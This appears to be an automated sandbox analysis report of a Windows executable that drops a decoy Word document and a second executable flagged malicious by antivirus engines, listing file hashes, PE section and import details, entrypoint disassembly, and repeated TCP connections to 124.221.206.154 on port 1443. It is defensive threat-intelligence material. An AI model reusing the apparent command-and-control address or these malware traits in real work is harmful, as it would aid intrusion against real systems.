                                                                                                                          Preview:L..................F.... ...g.5...}-.8.../S.5....A...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...U......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....hT....user..>.......NM..U.......S.....................`..a.l.f.o.n.s.....~.1......U....Desktop.h.......NM..U.......Y..............>......"Y.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..A...U.. .6ADF~1.DOC..f.......U...U.............................V.sQ.N..V.SP[lQ.S._U\Q..~.[hQ;e2..o`N.v...w..d.o.c.x...........$.......$...5...........h...............>.S......C:\Users\user\Desktop\?????????????????????.docx.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.sQ.N..V.SP[lQ.S._U\Q..~.[hQ;e2..o`N.v...w..d.o.c.x.......1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.sQ.N..V.SP[lQ.S._U\Q..~.[hQ;e2..o`N.v...w..d.o.c.x.........:..,.LB.)...Aw...`.......X.......927537...........!a..%.H.VZAj.....s.........W...!a..%.H.VZAj..

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94
                                                                                                                          Entropy (8bit):3.408464248242645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:bDuMJlWt6lmxWLRt6lv:bCNkRS
                                                                                                                          MD5:113750065807DAD15C00A178EB21FC45
                                                                                                                          SHA1:903505EE9B97E1FA7F39E9B9ECE4DE9B286E9289
                                                                                                                          SHA-256:04AFC953D6AAE679A3ABDBE0FF0B8C144B16D4CCF84959A2793E57F6777AB8DF
                                                                                                                          SHA-512:1F89B0584EEB6381314116748832AF82310053B659721AD6A07041FEAAA8E03E1A0EAF4C5400E1BBBB415B4A678C2C20F788AB8A69A6E2BB06436FB8B7C2DF8B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:[folders]..Templates.LNK=0..?????????????????????.LNK=0..[misc]..?????????????????????.LNK=0..

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):162
                                                                                                                          Entropy (8bit):2.9237687128468073
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Rl/Zdn98Udk1+lllllzHLl+l/Lcalt13l/9l:RtZT8Uq0ll/Ml/V
                                                                                                                          MD5:8DCBD88C0E65C7ECD29DAE006EE77D62
                                                                                                                          SHA1:EC6B2ADD4B3D90DB15700AC4D17BD605A33C870F
                                                                                                                          SHA-256:B1895309312CB6286E97EE77C39BDF25D76C3298190EADB8DB26D487D2E3C7DF
                                                                                                                          SHA-512:876FAF0B0681079CFA978F84C0BA46318998807C29811E4874D166F66D1E6E241E2237AEB26498E823193885E05BCDA230C357A91B640C35204D031333ECDC2A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.pratesh................................................p.r.a.t.e.s.h.....L+....9i.0..............f.........q...5i.1.../........................1i.2..............

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):20
                                                                                                                          Entropy (8bit):2.8954618442383215
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:QVNliGn:Q9rn
                                                                                                                          MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                          SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                          SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                          SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                          Preview:..p.r.a.t.e.s.h.....

                                                                                                                          C:\Users\user\Desktop\?????????????????????.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\1a#U77e5.exe
                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16768
                                                                                                                          Entropy (8bit):7.828953909266841
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:aYn7elOjZppldfDmfFPpT83uzRz/4id7miP9jT:aYnKlOjZPldfDMFPG+zRz5p
                                                                                                                          MD5:5F48BBB1AAC3B8D63AAAE3EC114BA340
                                                                                                                          SHA1:31FC3508AF156D67DA4BC6FE8D41206BDA5276EE
                                                                                                                          SHA-256:80596668ABC2C8C42481AD06713039198F08EB11C543061C3F9657A51248D04F
                                                                                                                          SHA-512:F5C3AF4E2269094C5381C512AE2A13C8204A34477DD47DB5D7ED4FC7BC986ECB36B2EF17B0A7470D1CB64404B8035CB7D27563C45E7F8E94FA92CFB9E3F6B9E8
                                                                                                                          Malicious:false
                                                                                                                          Preview:PK.........N.@................docProps/PK.........N.@...j...|.......docProps/app.xml.R.N.0..#..Q...-....'...@..r..Eb[.A..q^Q.Wn;3.x.c.......WF.R..4A-M..a.>7.."M|.....J....~y..g,...'.B.U.`....A.<.:*{..."t.b.{%.....u .......6.g...x...j..9../.......l/...c.>oM...Y..z>.r.`g\.y.,..F.;..qS.UU.dB....8..9M......<......o.|A.}?..R.X..|/z.@~..7.l.s7>.[.MN..T.V.1.,.Y'.....!V.w.m....W....r.fW......W.uVT.:...6[...hY.s.....@.N...|w*.9.2.q....PK.........N.@N..e............docProps/core.xml}..N.1...H.......$..Y$Z.T.J.*.........)\*.K...@j..K.y..q.+..I.A .3..7.x...4..u*3]D...`D&..t.a..vP.<7.......C{..V,r&2..l....\P..c"..9..!h........j...p...>......<..s\..&..R.....i...C...w.6(...`.{...l(...iew.-.X.O.....1nV6.......X..*S.....RT..=....u.S..~.%..hH....I..e.|..Z../.KVf...2....H........Ir.....t1...].~}.]....._.?|.........ySm[.@...B..I.O[l.....k@RZ.0R..K..N5.NT...<.PK.........N.@....'...........docProps/custom.xml...K.0....C.=....mG. .....4..MR.t:.............}.{..E..(..

                                                                                                                          C:\Users\user\Desktop\~$???????????????????.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):162
                                                                                                                          Entropy (8bit):2.9237687128468073
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Rl/Zdn98Udk1+lllllzHLl+l/Lcalt13l/9l:RtZT8Uq0ll/Ml/V
                                                                                                                          MD5:8DCBD88C0E65C7ECD29DAE006EE77D62
                                                                                                                          SHA1:EC6B2ADD4B3D90DB15700AC4D17BD605A33C870F
                                                                                                                          SHA-256:B1895309312CB6286E97EE77C39BDF25D76C3298190EADB8DB26D487D2E3C7DF
                                                                                                                          SHA-512:876FAF0B0681079CFA978F84C0BA46318998807C29811E4874D166F66D1E6E241E2237AEB26498E823193885E05BCDA230C357A91B640C35204D031333ECDC2A
                                                                                                                          Malicious:false
                                                                                                                          Preview:.pratesh................................................p.r.a.t.e.s.h.....L+....9i.0..............f.........q...5i.1.../........................1i.2..............

                                                                                                                          C:\Windows\Temp\????????????.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\1a#U77e5.exe
                                                                                                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2062848
                                                                                                                          Entropy (8bit):6.989271790744726
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:VLG1BKsKoBqgde0DTIK2u4WXr3R0lgaWPPCwha1w0UHfLBamlNRDz:VLGKTZBermgaWPPCwha14/LR
                                                                                                                          MD5:84E3D79DA5E503374E61A17351781C14
                                                                                                                          SHA1:6C4710E5E6BC0F991C6954E64E76EC8BF796A2E1
                                                                                                                          SHA-256:6254E9F7F9E61A1A80E8A3C01757B8D29C9AC0EB0D596236FC0A2944FD44DFD6
                                                                                                                          SHA-512:B287D405B01AAA7B7C35AE1787395CCE626A4565B28BB74D2AA715D251D580AAB4EEE513D29885728B56F0175CB13238B6DCF0EC228DB83C6AC90CA7EEECC4D8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........*..9....."..........Z......`.........@...............................%...........`... ...............................................#.|.............................$..%.................................................. Q..@............................text............................... ..`.rdata...#... ...$..................@..@.data........P...Z...:..............@.../4......'....P......................@..B/19.....=x...`...z..................@..B/32.....,I.......J..................@..B/46.....*....0.......Z..............@..B/65.....-....@.......\..............@..B/78.....I_...."..`...*..............@..B/90.....|r...p#..t..................@..B.idata..|.....#.....................@....reloc...%....$..&..................@..B.symtab..O...0$..P...*.................B........................................................................................

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                          Entropy (8bit):6.725931255932212
                                                                                                                          TrID:
                                                                                                                          • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                          • DOS Executable Generic (2002/1) 12.50%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                          File name:1a#U77e5.exe
                                                                                                                          File size:4732928
                                                                                                                          MD5:3f2202e24ad0a66c08f88a18dd7b5fb4
                                                                                                                          SHA1:62df51eb1351279afa4dbe5920758d6974427ac9
                                                                                                                          SHA256:eb94cd39cde6a5270181d6e6788c69a2a90ab2b27f9236c8382e810e4dfead1d
                                                                                                                          SHA512:cd87c99ce09a29a5317343e04bb55fd63cd0b98cebcb08793a9b1dd275a9c6ce09c53fb7f901fc6083d8992360d3fbe02438d4143a907be64e7bdca15567bc27
                                                                                                                          SSDEEP:49152:BuZC3FJrb/TWvO90dL3BmAFd4A64nsfJ+WNq3v3MVkOHx3bEnnkY3Xw4g9MUth7A:aC3F0uKUrwUZ0
                                                                                                                          TLSH:2426BF333982B8FADAAD697184242D411D7CB88B172053C7BB4975FE36BA2D44D3C768
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........F.P....."..........~......@.........@..............................PN...........`... ............................

                                                                                                                          File Icon

                                                                                                                          Icon Hash:554d5c5469694525

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x45ca40
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:6
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:6
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:6
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:9cbefe68f395e67356e2a5d8d1b285c0

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          jmp 00007FAA8CC452C0h
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          pushfd
                                                                                                                          cld
                                                                                                                          dec eax
                                                                                                                          sub esp, 000000E0h
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp], edi
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+08h], esi
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+10h], ebp
                                                                                                                          dec eax
                                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+20h], esp
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+28h], ebp
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+30h], esi
                                                                                                                          dec esp
                                                                                                                          mov dword ptr [esp+38h], edi
                                                                                                                          movups dqword ptr [esp+40h], xmm6
                                                                                                                          movups dqword ptr [esp+50h], xmm7
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+60h], xmm0
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+70h], xmm1
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+00000080h], xmm2
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+00000090h], xmm3
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+000000A0h], xmm4
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+000000B0h], xmm5
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+000000C0h], xmm6
                                                                                                                          inc esp
                                                                                                                          movups dqword ptr [esp+000000D0h], xmm7
                                                                                                                          dec eax
                                                                                                                          sub esp, 30h
                                                                                                                          dec ecx
                                                                                                                          mov edi, eax
                                                                                                                          dec eax
                                                                                                                          mov edx, dword ptr [00000028h]
                                                                                                                          dec eax
                                                                                                                          cmp edx, 00000000h
                                                                                                                          jne 00007FAA8CC48F4Eh
                                                                                                                          dec eax
                                                                                                                          mov eax, 00000000h
                                                                                                                          jmp 00007FAA8CC48FC5h
                                                                                                                          dec eax
                                                                                                                          mov edx, dword ptr [edx+00000000h]
                                                                                                                          dec eax
                                                                                                                          cmp edx, 00000000h

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4c60000x47c.idata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e20000x2678.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c70000x2b0a.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3cf1400x140.data
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x8fc6a0x8fe00False0.4675638710903562data6.177951506515494IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x910000x33d8f00x33da00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x3cf0000x720a00x17e00False0.35497791230366493data4.298912004398371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          /40x4420000x1270x200False0.6171875data5.097874074212899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          /190x4430000x1d5780x1d600False0.9987782579787234data7.993303104291631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          /320x4610000x5b0b0x5c00False0.9890455163043478data7.917262410977086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          /460x4670000x2a0x200False0.091796875data0.7534025800416837IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          /650x4680000x34e350x35000False0.9983048349056604data7.995735953621072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          /780x49d0000x1e4010x1e600False0.9892698688271605data7.987159878797264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          /900x4bc0000x977c0x9800False0.9757401315789473data7.788382558202588IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          .idata0x4c60000x47c0x600False0.3313802083333333data3.514698326038637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .reloc0x4c70000x2b0a0x2c00False0.3710049715909091data5.397043934669771IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          .symtab0x4ca0000x17c100x17e00False0.2733045647905759data5.119810305846417IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x4e20000x26780x2800False0.43115234375data5.682287008823302IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                          RT_ICON0x4e20b80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4280181209, next used block 4280181211EnglishUnited States
                                                                                                                          RT_GROUP_ICON0x4e46600x14dataEnglishUnited States

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States

                                                                                                                          Network Behavior

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Aug 5, 2022 09:55:49.280426979 CEST497551443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:49.470936060 CEST144349755124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:50.056755066 CEST497551443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:50.248254061 CEST144349755124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:50.846036911 CEST497551443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:51.035944939 CEST144349755124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:51.151525021 CEST497631443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:51.379904985 CEST144349763124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:52.049324036 CEST497631443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:52.277442932 CEST144349763124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:52.846239090 CEST497631443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:53.069526911 CEST144349763124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:53.273742914 CEST497671443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:53.499203920 CEST144349767124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:54.049468994 CEST497671443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:54.277996063 CEST144349767124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:54.846920013 CEST497671443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:55.072638988 CEST144349767124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:55.255032063 CEST497691443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:55.474117041 CEST144349769124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:56.049721003 CEST497691443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:56.268788099 CEST144349769124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:56.846615076 CEST497691443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:57.066648006 CEST144349769124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:57.245265007 CEST497761443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:57.465364933 CEST144349776124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:58.065488100 CEST497761443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:58.281260014 CEST144349776124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:58.846745014 CEST497761443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:59.065027952 CEST144349776124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:55:59.198276997 CEST497771443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:55:59.424679041 CEST144349777124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:00.065619946 CEST497771443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:00.291865110 CEST144349777124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:00.862615108 CEST497771443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:01.089356899 CEST144349777124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:01.561662912 CEST497781443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:01.754937887 CEST144349778124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:02.363183022 CEST497781443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:02.557374001 CEST144349778124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:03.065870047 CEST497781443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:03.259234905 CEST144349778124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:03.430304050 CEST497791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:03.645586967 CEST144349779124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:04.238054037 CEST497791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:04.453716993 CEST144349779124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:05.050407887 CEST497791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:05.266046047 CEST144349779124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:05.413183928 CEST497801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:05.616344929 CEST144349780124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:06.238074064 CEST497801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:06.441137075 CEST144349780124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:07.050636053 CEST497801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:07.253810883 CEST144349780124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:07.442192078 CEST497811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:07.682126999 CEST144349781124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:08.253863096 CEST497811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:08.493702888 CEST144349781124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:09.066442966 CEST497811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:09.306078911 CEST144349781124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:09.483295918 CEST497821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:12.566765070 CEST497821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:12.794334888 CEST144349782124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:13.363702059 CEST497821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:25.599271059 CEST497931443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:25.793513060 CEST144349793124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:26.364763021 CEST497931443192.168.2.5124.221.206.154
